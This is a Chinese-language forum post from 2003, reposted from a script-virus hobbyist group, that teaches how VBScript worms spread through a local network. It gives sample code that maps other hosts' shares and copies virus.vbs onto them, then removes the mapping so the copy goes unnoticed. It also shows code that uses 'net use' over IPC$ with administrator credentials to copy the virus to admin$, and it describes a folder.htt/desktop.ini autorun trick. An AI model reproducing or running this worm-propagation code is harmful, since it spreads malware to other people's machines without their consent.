史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
註冊帳號 論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2003-11-15, 05:46 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 淺析區域網路指令碼蠕蟲的傳播

絡上看到了一些關於區域網路指令碼蠕蟲的傳播方式的一些討論,這裡提供一些思路。

1. 利用WSH裡的MapNetworkDrive方法。該方法是將網路驅動器映射到本機。

MapNetworkDrive方法:
object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword])
參數
object
WshNetwork 對象。
strLocalName
表示映射驅動器的本機名的字串串值。
strRemoteName
表示共享的 UNC 名稱 (\\xxx\yyy) 的字串串值。
bUpdateProfile
可選。
表示映射信息是否存儲在當前的使用者設定檔中的布爾值。如果提供的 bUpdateProfile 的值為 true,則該映射存儲在用戶的配置文件中(預設值為 false)。

strUser
可選。表示用戶名的字串串值。如果使用當前用戶以外的其他用戶的憑據來映射網路驅動器,則必須提供該參數。
strPassword
可選。表示用戶密碼的字串串值。如果使用當前用戶以外的其他用戶的憑據來映射網路驅動器,則必須提供該參數。
說明
嘗試映射非共享的網路驅動器時將產生錯誤。
主要原理是:得到本機的LAN位址後(一般為192.168.*.*)將其他主機的共享目錄映射為本機的驅動器(如Z,然後將病毒複製到映射的本機驅動器Z:,這樣就把病毒複製到其他主機的目錄去了。最後,還要使用RemoveNetworkDrive方法刪除映射,以免被發現。
RemoveNetworkDrive方法:
object.RemoveNetworkDrive(strName, [bForce], [bUpdateProfile])
參數
object
WshNetwork 對象。

strName
表示要刪除的映射驅動器名的字串串值。strName 參數可以是本機名稱,也可以是遠端名稱,這取決於驅動器的映射方法。
bForce
可選。表示是否強制刪除映射驅動器的布爾值。如果提供的 bForce 的值為 true,則無論該資源是否正在使用,該方法都刪除這些連接。
bUpdateProfile
可選。表示是否從用戶的配置文件中刪除映射的字串串值。如果提供 bUpdateProfile 且其值為 true,則從使用者設定檔中刪除該映射。bUpdateProfile 的預設值為 false。

說明
如果在本機名稱(驅動器名)和遠端名稱(UNC 名稱)之間存在映射關係,則 strName 必須設定為本機名稱。

如網路路徑中不存在本機名稱(驅動器字母)映射,則 strName 必須設為遠端名稱。

我這裡給一段VBS的示例程式碼:


Set myfso= CreateObject("Scripting.FileSystemObject")
Set WshNetwork = WScript.CreateObject("WScript.Network")
WshNetwork.MapNetworkDrive "I:", "\\" & unc
fso.copyfile "c:\virus.vbs " ,"I:\virus.vbs.txt"
WshNetwork.RemoveNetworkDrive "I:"


2. 利用IPC$進行連接。

這種方式估計玩HACK的朋友比較熟悉啦!原理就是利用WSCRIPT.SHELL來執行。具體可以參考各種IPC$攻擊傻瓜教程,這裡僅提供一段程式碼:

Set objshell=wscript.createobject("wscript.shell")
Dim st,sc
st="net use \\" & "192.168.0.1 \IPC$ "& pass &" /" & "administrator"
objshell.run st
sc="copy c:\virus.vbs \\192.168.0.1\admin$"
objshell.run sc
3. 就是像「新歡樂時光」病毒一樣的利用FOLDER.HTT的被動式進行傳播。

Desktop.ini: 活動桌面的配置文件
Desktop.ini定義了它所在的資料夾在桌面上或者在檔案總管中的顯示風格以及資料夾的某些內容。

關鍵:WebViewTemplate.NT5=file://Folder.htt

就是修改desktop.ini使其指向同目錄下的folder.htt,當以WEB視圖開啟資料夾時,就會按照desktop.ini裡面的設定執行folder.htt。這樣我們就可以把病毒寫入folder.htt,
使之不斷複製。

具體參見其他有關新歡樂時光的病毒分析。

這是我個人所瞭解的傳播方式,如果您還有更好的想法,不妨告訴我。
同時歡迎指令碼病毒愛好者來到「指令碼病毒技術沙龍」交流,學習!



來源: 指令碼病毒技術沙龍: http://www.chinaghost.net/svts
psac 目前離線  
送花文章: 3, 收花文章: 1629 篇, 收花: 3202 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 06:34 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1